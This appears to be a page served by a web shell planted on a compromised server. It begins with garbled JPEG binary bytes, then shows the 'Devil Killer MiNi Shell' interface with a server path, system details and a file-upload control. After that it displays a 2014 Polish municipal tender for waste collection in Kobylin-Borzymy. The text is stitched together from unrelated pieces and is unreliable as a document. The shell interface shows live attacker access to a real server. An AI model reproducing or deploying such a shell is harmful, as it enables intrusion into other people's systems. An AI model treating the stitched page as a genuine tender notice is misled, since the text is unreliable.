JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141201/393104-N-2014.html

<p class="kh_header"><b>Kobylin-Borzymy: świadczenie usług w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych na obszarze 
Gminy Kobylin-Borzymy na lata 2015-2016</b><br>
<b>Numer ogłoszenia: 393104 - 2014; data zamieszczenia: 01.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobylin-Borzymy , ul. Główna 11, 18-204 Kobylin-Borzymy, woj. podlaskie, tel. 086 2743003, 2743026, faks 086 2743003.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kobylinborzymy.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych na obszarze 
Gminy Kobylin-Borzymy na lata 2015-2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Charakterystyka Gminy Kobylin-Borzymy
Powierzchnia Gminy Kobylin-Borzymy wynosi 12.000 ha
Liczba sołectw 40. 
Gospodarstw domowych wg deklaracji 658, zamieszkałych przez około 2481 osób, liczba nieruchomości i osób je zamieszkałych jest zmienna. 
Zamawiający zastrzega sobie prawo zmiany ilości punktów ( nieruchomości) odbioru odpadów.
Podana ilość gospodarstw może ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego. 
Wykonawcy nie przysługuje prawo zmiany wysokości zapłaty za zwiększenie lub zmniejszenie wskazanych ilości odpadów komunalnych.                             
2. Opis przedmiotu zamówienia
Przedmiotem niniejszego zamówienia jest : świadczenie usług w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych na obszarze Gminy Kobylin-Borzymy.
W wyniku podpisanej umowy Wykonawca w cenie ryczałtowej wykona kompleksową obsługę w zakresie odbioru i zagospodarowania odpadów komunalnych z terenu Gminy Kobylin-Borzymy. Odbiór i zagospodarowanie odpadów komunalnych dotyczy nieruchomości, na których zamieszkują mieszkańcy, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013r. poz. 1399 z póź. zm)
Wykonawca będzie wykonywał przez cały okres obowiązywania umowy odbiór odpadów z pojemników oraz odbiór odpadów zebranych selektywnie w workach i pojemnikach  z poszczególnych miejscowości Gminy Kobylin-Borzymy. Ponadto Wykonawca w przypadku utworzenia, Stałego Punkt Selektywnego Zbierania Odpadów Komunalnych wyposaży go w niezbędne pojemniki.
Wykonawca jest również zobowiązany do prowadzenia szczegółowej dokumentacji związanej z realizacją przedmiotowego świadczenia.
Umowa obejmuje także zbiórkę:
-  w formie objazdowej odpadów wielkogabarytowych i wyeksploatowanego sprzętu elektrycznego i elektronicznego, chemikalia, opony dwa razy w każdym roku w uzgodnionym z zamawiającym terminie. 
- odpadów budowlanych  w ilości do 2,5m3 z nieruchomości na rok. 

Rodzaj odpadów / frakcji stanowiących przedmiot zamówienia
1.	Nie segregowane (zmieszane) odpady komunalne,
2.	Papier, tektura, tworzywa sztuczne, metal, 
opakowania: papierowe, tekturowe, metalowe, z tworzyw sztucznych , wielomateriałowe itp..
3.	Szkło,
5.	Zużyte opony.
6.    Odpady ulegające biodegradacji, w tym odpady zielone,
7.	Przeterminowane leki i chemikalia,
8.	Zużyte baterie i akumulatory,
9.	Zużyty sprzęt elektryczny i elektroniczny,
10.	Meble i inne odpady wielkogabarytowe,
11.	Odpady budowlane i rozbiórkowe,

3. Szczegółowy opis przedmiotu zamówienia
Przedmiotem zamówienia jest odbiór i zagospodarowanie całej masy odpadów komunalnych zebranych od właścicieli nieruchomości zamieszkałych na terenie Gminy Kobylin-Borzymy .
Wykonawca zobowiązany jest do odbioru i zagospodarowania odpadów komunalnych zmieszanych ( za odpady zmieszane uznane są odpady niesegregowane oraz odpady, które pozostały po segregacji ) oraz całej masy odpadów gromadzonych w sposób selektywny.
Wykonawca zobowiązany będzie również do odbioru i zagospodarowania odpadów gromadzonych w sposób selektywny z Stałego Punktu Selektywnego Zbierania Odpadów Komunalnych w przypadku jego utworzenia i wyposażenia go w odpowiednie pojemniki.  
Zamawiający w Specyfikacji Istotnych Warunków Zamówienia załącza dane dotyczące  ilości gospodarstw jakiej będzie dotyczył wywóz odpadów, aktualne na dzień 27-11-2014.

Na terenie Gminy obowiązywać będzie system mieszany 
workowo - pojemnikowy zbierania odpadów komunalnych.
Wyposażenie nieruchomości w pojemniki należy do obowiązków właścicieli nieruchomości. Natomiast worki zapewnia i dostarcza Wykonawca.  Wykonawca w ramach niniejszego zamówienia zobowiązany jest również do zapewnienia pojemników dla właścicieli nieruchomości na ich wniosek na wspólnie ustalonych zasadach (sprzedaż, wynajem, dzierżawa).
4.	Sposób  gromadzenia i odbioru odpadów: 
a) Niesegregowane odpady komunalne
Niesegregowane (zmieszane) odpady komunalne oraz odpady pozostałe po segregacji gromadzone  będą w pojemnikach.
Częstotliwość odbioru przez Wykonawcę -   raz na miesiąc 
b) Selektywnie zbierane odpady komunalne
1. Selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej będzie się odbywać w systemie workowym z podziałem na następujące frakcje:
- worek żółty: papier, tektura, tworzywa sztuczne, metal, opakowania:  papierowe, tekturowe,
  metalowe, z tworzyw sztucznych , wielomateriałowe itp..,   
- worek bezbarwny:  szkło, opakowania szklane 
- worek brązowy:  odpady ulegające biodegradacji, w tym odpady zielone,
2. Częstotliwość odbioru: 
-   worek żółty           -  raz na dwa miesiące 
-  worek bezbarwny - raz na cztery miesiące 
-  worek brązowy     -  trzy razy w roku - według wskazań zamawiającego 
c) Odpady budowlane i rozbiórkowe: 
Wykonawca w ramach umowy zobowiązany będzie odebrać raz do roku do 2,5m3 odpadów budowlanych i remontowych z jednej nieruchomości,  w terminach ustalonych przez Zamawiającego. Terminy odbioru ustalone przez Zamawiającego nie będą krótsze niż 7 dni, od powiadomienia Wykonawcy.
d) Przeterminowane leki i baterie
Wykonawca zobowiązany będzie do wyposażenia wskazanych przez Zamawiającego punktów na terenie Gminy ( punkt apteczny, Urząd Gminy, sklepy, szkoły ) w odpowiednie oznaczone pojemniki do oddawania przez mieszkańców:
- przeterminowane leki   -  dwa punkty
- baterie                            -  sześć punktów 
Przewiduje się opróżnianie pojemników - z częstotliwością raz na pół roku, lub częściej tak aby nie dopuścić do przepełnienia pojemnika.   
e) Pozostałe odpady w tym: meble i inne odpady wielkogabarytowe, opony, chemikalia,  sprzęt elektryczny i elektroniczny:
Wykonawca dwa razy w roku będzie odbierał wystawione odpady bezpośrednio z nieruchomości w zatwierdzonych przez Zamawiającego i ustalonych z Wykonawcą szczegółowych terminach - dwa razy w roku (w okresie wiosennym i jesiennym).
5.Wykaz urządzeń do gromadzenia odpadów
Charakterystyka pojemników do zbiórki odpadów nie segregowanych z nieruchomości zamieszkałych
 Pojemniki  wykonane zgodnie z obowiązującymi normami o pojemności:
- min 120 dm3 ( l )  - dopuszcza się pojemnik o pojemności 110 dm3 ( l )
Selektywna zbiórka odpadów komunalnych  będzie się odbywała w systemie workowym. 
- worek żółty: papier, tektura, tworzywa sztuczne, metal, opakowania:  papierowe, tekturowe,
  metalowe, z tworzyw sztucznych , wielomateriałowe itp..,   
- worek bezbarwny:  szkło, opakowania szklane 
- worek brązowy:  odpady ulegające biodegradacji, w tym odpady zielone,
Zamawiający wymaga stosowania worków z folii LDPE o pojemności min 120 dm3  (litrów) wykonane zgodnie z obowiązującymi normami o grubości zapobiegającej pęknięciu lub rozerwaniu przeznaczone do gromadzenia odpadów selektywnych.
7. Obowiązki wykonawcy przed rozpoczęciem i w trakcie realizacji zamówienia
1) Przed rozpoczęciem realizacji zamówienia Zamawiający dostarczy Wykonawcy zakres adresów nieruchomości przewidzianych do odbioru odpadów. 
2) Wykonawca jest zobowiązany do egzekwowania od właścicieli nieruchomości, którzy zadeklarowali prowadzenie selektywnej zbiórki odpadów ich odpowiedniego selekcjonowania. Wykonawca jest zobowiązany do informowania Gminy o zaprzestaniu prowadzenia selektywnej zbiórki odpadów i załączenie informacji na ten temat do faktury za poprzedni miesiąc.
3) Wyposażenie nieruchomości w pojemniki należy do obowiązków właścicieli nieruchomości. Wykonawca w ramach niniejszego zamówienia zobowiązany jest do zapewnienia pojemników dla właścicieli nieruchomości na ich wniosek na wspólnie ustalonych zasadach (sprzedaż, wynajem, dzierżawa). Natomiast worki o przewidzianej kolorystyce, pojemności i w ustalonej ilości tj. co najmniej jeden worek na jednego mieszkańca nieruchomości na jeden odbiór dla każdego koloru, zapewnia i dostarcza Wykonawca. Niezależnie od powyższego Wykonawca dostarczy do Urzędu Gminy: 
-  1000 sztuk worków żółtych 
-  700 sztuk worków bezbarwnych 
-  100 sztuk worków brązowych 
celem uzupełnienia ewentualnych braków.
Worki w opisanej wyżej ilości Wykonawca będzie dostarczał do nieruchomości w momencie  odbioru worków z odpadami danego koloru. Pierwszą dostawę worków do nieruchomości Wykonawca dostarczy w ciągu 10 dni od podpisania umowy.  
4) Wykonawca zobowiązany jest sporządzić harmonogramy odbioru odpadów oraz  odpowiada za informowanie mieszkańców o zasadach i terminach odbierania poszczególnych rodzajów odpadów (między innymi dostarczając harmonogramy do właścicieli nieruchomości). Przed przystąpieniem do realizacji zamówienia Wykonawca  przedstawia Zamawiającemu do akceptacji harmonogram wywozu odpadów. Zamawiający zaakceptuje harmonogram  lub przedstawi uwagi do niego w terminie 7 dni od jego otrzymania.
Harmonogram powinien odpowiadać następującym wytycznym:
- powinien być sformułowany w sposób przejrzysty, pozwalający na szybkie zorientowanie się co do konkretnych dat odbierania odpadów, jak też regularności i powtarzalności odbierania poszczególnych rodzajów odpadów.
- powinien wskazywać na daty odbierania poszczególnych rodzajów odpadów z miejscowości.
5) Odpady zebrane od właścicieli nieruchomości z terenu Gminy Kobylin-Borzymy Wykonawca zobowiązany jest zagospodarować, poddać odzyskowi lub unieszkodliwianiu zgodnie z obowiązującym prawem w tym wymaganiami ochrony środowiska, Planem Gospodarki Odpadami dla Województwa Podlaskiego.
6) System odbierania odpadów komunalnych nie obejmuje odpadów powstałych w wyniku prowadzenia działalności gospodarczej.
7) Wykonawca jest zobowiązany do niezwłocznego przekazywania Zamawiającemu informacji o niezgodnym z Regulaminem utrzymania czystości i porządku na terenie Gminy Kobylin-Borzymy i złożoną deklaracją gromadzenia odpadów, w szczególności ich mieszaniu lub przygotowaniu do odbioru w niewłaściwych pojemnikach. Informacja powinna zawierać w szczególności :
- adres nieruchomości na której odpady gromadzone są w sposób niezgodny z Regulaminem utrzymania czystości i porządku na terenie gminy.
- zdjęcia w postaci cyfrowej dowodzące, że odpady gromadzone są w sposób niewłaściwy: zdjęcia muszą zostać wykonane w taki sposób, aby nie budząc wątpliwości pozwalały na przypisanie pojemników lub worków do konkretnej nieruchomości.
- Imiona i Nazwiska pracowników Wykonawcy, którzy stwierdzili fakt niezgodnego z Regulaminem postepowania z odpadami komunalnymi.
8) Wykonawca jest zobowiązany do bieżącego przekazania adresów nieruchomości na których zamieszkują mieszkańcy i na których powstały odpady, a nie zostały ujęte w bazie danych prowadzonej przez Zamawiającego.
9) Wykonawca jest zobowiązany do odbierania odpadów komunalnych:
a)	w terminach wynikających z przyjętego harmonogramu odbioru, niezależnie od warunków atmosferycznych,
b)	pojazdami przystosowanymi do odbierania poszczególnych frakcji odpadów, w sposób wykluczający mieszanie odpadów,
c)	również w przypadku kiedy dojazd do nieruchomości będzie utrudniony, w szczególności w przypadku złych warunków atmosferycznych, z powodu prowadzonych remontów dróg, objazdów, znacznego oddalenia nieruchomości od drogi  itp. W takich przypadkach wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji zamówienia,
10) Wykonawca zobowiązany jest do odebrania wszystkich odpadów komunalnych wytworzonych na terenie wszystkich nieruchomości, na których zamieszkują mieszkańcy, zgromadzonych w pojemnikach i workach.
11) Na żądanie Zamawiającego, Wykonawca podda pojazdy odbierające odpady ważeniu na terenie gminy przed i po zbiórce. 
12)  Prowadzenie sprawozdawczości oraz dokumentacji związanej z działalnością objętą zamówieniem w okresie realizacji, zgodnie z wymaganiami prawa  w tym zakresie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.32.00-8, 90.53.30.00-2, 90.51.40.00-3, 90.51.10.00-2, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:  5.000,00 PLN
1.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	Pieniądzu,
2)	Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	Gwarancjach bankowych, 
4)	Gwarancjach ubezpieczeniowych,
5)	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275, z późn. zm.) 
2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 04 8775 0009 0030 0300 0198 0003
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed upływem terminu składania ofert znajdzie się na rachunku bankowym Zamawiającego. 
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew na rachunek bankowy wskazany przez Wykonawcę.
3.	W przypadku wnoszenia wadium w formie poręczenia lub gwarancji, oryginał poręczenia lub gwarancji należy złożyć w oddzielnym, zamkniętym opakowaniu (kopercie) przed upływem terminu składania ofert. Opakowanie (kopertę) zawierającą dokument wadialny należy opisać analogicznie do opisu oferty, z dopiskiem: wadium.
4.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu na składanie ofert. 
5.	Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 pzp, zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą. 
6.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta został wybrana, jako najkorzystniejsza, z zastrzeżeniem, że Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
8.	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10.	Okoliczności zatrzymania wadium oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca:
- posiada wpis do rejestru działalności regulowanej stosownie do wymogów art. 9b ustawy z dnia 13.09.1996r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2013 r. poz. 1399 ze zmianami), co najmniej w zakresie odpadów stanowiących przedmiot zamówienia,
- posiada aktualne zezwolenie na prowadzenie działalności w zakresie zbierania  i transportu odpadów w myśl przepisów ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował zgodne z wymaganiami  Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122) :
- co najmniej dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych, 
- co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych
- co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej,
- bazą magazynowo-transportową.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli  Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 100.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin płatności - 1</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4. Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia n/w okoliczności, z uwzględnieniem podanych warunków ich wprowadzenia:
a) wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,
b) zmiana stawki podatku od towarów i usług (gdy ustawowo zostanie zmieniona wysokość podatku - wynagrodzenie brutto pozostałe do końca realizacji umowy może wzrosnąć o zwiększoną wartość tego podatku,
c) zmiana treści umowy wynikać będzie z konieczności dostosowania do obowiązujących przepisów prawa w tym prawa miejscowego, znowelizowanego bądź wprowadzonego w trakcie wykonywania zamówienia,
d) w zakresie częstotliwości odbioru odpadów, rodzaju i ilości frakcji odbieranych odpadów,
